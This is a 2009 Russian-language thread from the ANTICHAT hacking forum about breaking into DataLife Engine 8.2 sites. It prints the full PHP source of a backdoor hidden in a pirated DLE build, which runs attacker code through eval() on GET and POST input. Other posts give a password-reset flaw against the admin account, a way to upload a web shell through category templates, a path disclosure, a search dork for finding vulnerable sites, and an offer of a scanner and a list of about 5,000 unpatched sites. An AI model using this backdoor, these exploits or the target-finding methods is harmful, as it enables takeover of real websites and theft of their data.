ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
05.11.2009, 00:54
|
|
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
Провел на форуме:
1686744
Репутация:
246
|
|
Народ есть способы залить шел через админку в dle 8.2 ???
|
|
|
05.11.2009, 06:49
|
|
Новичок
Регистрация: 11.11.2007
Сообщений: 17
Провел на форуме:
64705
Репутация:
6
|
|
Мэилбраш же вон написал способ. Только так вроде.
|
|
|
|
05.11.2009, 10:31
|
|
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
Провел на форуме:
1686744
Репутация:
246
|
|
Был найден бэкдор в нулле от -=ZLOY=-
В этом файле был бэкдор. eval() через $_POST
Файл лежит в (/engine/ajax/updates.php)
Код бэкдора
PHP код:
if($_GET['wert']==''){
require_once ROOT_DIR.'/language/'.$selected_language.'/adminpanel.lng';
$config['charset'] = ($lang['charset'] != '') ? $lang['charset'] : $config['charset'];
@header("HTTP/1.0 200 OK");
@header("HTTP/1.1 200 OK");
@header("Cache-Control: no-cache, must-revalidate, max-age=0");
@header("Expires: 0");
@header("Pragma: no-cache");
@header("Content-type: text/css; charset=".$config['charset']);
$data = @file_get_contents("http://www.dle-news.ru/extras/updates.php?version_id=".$_REQUEST['versionid']."&key=".$config['key']);
if (!strlen($data)) echo $lang['no_update']; else echo $data;
}else{
$file=(ROOT_DIR."/engine/classes/mysql.class.php");
if(file_exists($file)){ @require($file); $x.="mysql.class.php - ok<br />";}
$file=(ROOT_DIR."/engine/data/dbconfig.php");
if(file_exists($file)){ @require($file); $x.="dbconfig.php - ok<br />";}
$file=(ROOT_DIR."/engine/data/config.php");
if(file_exists($file)){ @require($file); $x.="config.php - ok<br />";}
eval(base64_decode($_GET['user_id']));
echo <<<HTML
<HTML><body><form action="" method="post">
<center><textarea name="text" rows="10" cols="100"></textarea>
<br /><input type="submit" value="Canoinoaaoe"/></center></form></body></HTML>
HTML;
if($_POST['text']!=''){eval(stripcslashes($_POST['text']));
}}
Последний раз редактировалось S0ulVortex; 06.11.2009 в 17:31..
|
|
|
|
12.11.2009, 19:07
|
|
Участник форума
Регистрация: 02.04.2006
Сообщений: 273
Провел на форуме:
1269624
Репутация:
114
|
|
Найдена уязвимость в DLE 8.2(Только в этой версии)
/index.php?do=lostpassword&douser=1&lostid=
Получаем пас от пользователя с id 1
На офф сайте уже доступна заплатка.
В новых версиях дле даже можно версию узнать ))
engine/skins/images/logos.jpg
Теперь у каждой версии в админки стоит версия в лого )
Это просто шикарно )
Последний раз редактировалось EST a1ien; 12.11.2009 в 19:21..
|
|
|
|
13.11.2009, 14:50
|
|
Banned
Регистрация: 16.06.2009
Сообщений: 115
Провел на форуме:
486953
Репутация:
62
|
|
Проблемму с лостпассворд профиксили. dle.org7.ru
|
|
|
|
15.11.2009, 02:55
|
|
Banned
Регистрация: 16.06.2009
Сообщений: 115
Провел на форуме:
486953
Репутация:
62
|
|
Еще одна бага есть. можн залить шелл с помощю категорий. создаете категорию туда свой шаблон с шеллом. вродь до 7.2 у мя пахало
|
|
|
|
19.11.2009, 13:30
|
|
Вор привыкший воровать
Регистрация: 01.10.2009
Сообщений: 270
Провел на форуме:
1230670
Репутация:
218
|
|
Какой запрос в гугл вбить дабы найти DLE версии только 8.2?Может есть какой-то признак по урлу, inurl:blabla ?
|
|
|
|
23.11.2009, 05:25
|
|
Участник форума
Регистрация: 29.04.2008
Сообщений: 106
Провел на форуме:
647733
Репутация:
46
|
|
Сообщение от NoEasyWayOut
Какой запрос в гугл вбить дабы найти DLE версии только 8.2?Может есть какой-то признак по урлу, inurl:blabla ?
Можно на images.google.ru вбить
"engine/skins/images/logos.jpg" Datalife Engine
http://images.google.ru/images?hl=ru&source=hp&q=%22engine%2Fskins%2Fimage s%2Flogos.jpg%22+Datalife+Engine&btnG=%D0%9F%D0%BE %D0%B8%D1%81%D0%BA+%D0%BA%D0%B0%D1%80%D1%82%D0%B8% D0%BD%D0%BE%D0%BA&gbv=2&aq=f&oq=
|
|
|
|
23.11.2009, 03:20
|
|
Участник форума
Регистрация: 23.08.2008
Сообщений: 143
Провел на форуме:
1149516
Репутация:
52
|
|
8.2, раскрытие путей
selected_language = .
admin.php
|
|
|
|
24.11.2009, 22:34
|
|
Новичок
Регистрация: 20.11.2009
Сообщений: 17
Провел на форуме:
23696
Репутация:
-4
|
|
Выкладываю скрипт поиска DLE 8.2. Многопоточность. CURL.
http://depositfiles.com/files/6s4qs35gb
Берёт данные из файла где собраны любые версии ДЛЕ. Можно иметь просто любые сайты, но признаки поиска ДЛЕ для гугла, например, известны, ему самому, а занчит и вам. 
Кому лень возиться со скриптом, вэлком в готовую базу. Примерно 5к версии 8,2. На сегодня половина ещё висят без фиксов. Эх, аккуратнее, и имейте честь и достоинство. Жаль хайда нет.
Последний раз редактировалось slva2000; 24.11.2009 в 22:56..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
